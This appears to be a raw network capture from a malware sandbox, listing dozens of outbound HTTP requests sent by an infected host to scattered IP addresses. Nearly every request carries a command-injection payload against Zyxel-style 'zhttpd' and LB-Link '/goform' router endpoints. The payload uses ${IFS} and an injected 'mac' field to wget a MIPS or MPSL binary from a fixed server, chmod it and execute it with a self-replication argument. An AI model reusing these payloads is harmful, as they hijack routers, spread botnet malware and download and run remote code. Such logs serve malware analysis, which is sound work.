                                          Jan 14, 2024 15:46:13.946149111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3827192.168.2.23348921.123.248.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946175098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3828192.168.2.235018635.249.129.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946232080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3829192.168.2.2353516206.206.137.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946259022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3830192.168.2.2336766106.216.87.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946306944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3831192.168.2.235862695.165.1.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946352959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3832192.168.2.2351644192.192.61.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946379900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3833192.168.2.234158012.118.98.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946444988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3834192.168.2.2335762165.205.108.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946455002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3835192.168.2.2350860133.66.163.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946477890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3836192.168.2.2339922141.111.171.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946561098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3837192.168.2.2334902191.61.209.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946578979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3838192.168.2.2351686132.76.11.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946643114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3839192.168.2.2343496148.17.13.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946675062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3840192.168.2.2333862146.128.6.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946738958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3841192.168.2.234120097.0.217.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946803093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3842192.168.2.2341758170.83.0.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946820974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3843192.168.2.2346348156.219.81.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946855068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3844192.168.2.2347140175.145.102.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946888924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3845192.168.2.234091846.190.189.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946926117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3846192.168.2.2358710186.171.93.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946974993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3847192.168.2.23486764.160.179.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946997881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3848192.168.2.2338668107.154.247.2408080
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.815692902 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3849192.168.2.2352800186.185.39.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960270882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3850192.168.2.233367053.85.109.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960338116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3851192.168.2.233928686.114.134.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960370064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3852192.168.2.2346530177.98.235.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960397959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3853192.168.2.2345104123.124.124.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960462093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3854192.168.2.2346670111.48.223.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960462093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3855192.168.2.2345478142.39.237.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960500002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3856192.168.2.234078861.23.61.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960565090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3857192.168.2.2347414106.69.205.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960592031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3858192.168.2.234566018.205.66.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960624933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3859192.168.2.2338750129.23.166.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960649967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3860192.168.2.2346634106.217.192.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960700989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3861192.168.2.2354452151.35.168.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960741043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3862192.168.2.2339462131.182.235.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960794926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3863192.168.2.2340206180.33.11.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960832119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3864192.168.2.23330168.151.52.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960851908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3865192.168.2.2349374217.220.19.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960890055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3866192.168.2.2350028143.168.179.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960913897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3867192.168.2.2336102204.158.45.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.960937977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3868192.168.2.2352606179.123.220.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961014032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3869192.168.2.235534438.24.227.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961040974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3870192.168.2.234647074.51.31.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961105108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3871192.168.2.2335160177.50.235.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961153030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3872192.168.2.2351594133.235.56.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961205959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3873192.168.2.2341112213.21.25.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961253881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3874192.168.2.2337160188.100.57.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961286068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3875192.168.2.2332924179.37.187.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961327076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3876192.168.2.2351186146.118.198.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961368084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3877192.168.2.2347964128.149.8.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961396933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3878192.168.2.2350400133.57.122.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961452961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3879192.168.2.2346030132.209.237.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961493015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3880192.168.2.233410840.185.89.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961541891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3881192.168.2.2333914167.59.121.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961564064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3882192.168.2.2332986174.99.232.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961638927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3883192.168.2.233306898.86.104.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961673021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3884192.168.2.234756686.49.84.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961709023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3885192.168.2.233626066.192.169.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961744070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3886192.168.2.2360706108.137.21.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961783886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3887192.168.2.233721660.153.56.113443
                                          TimestampBytes transferredDirectionData
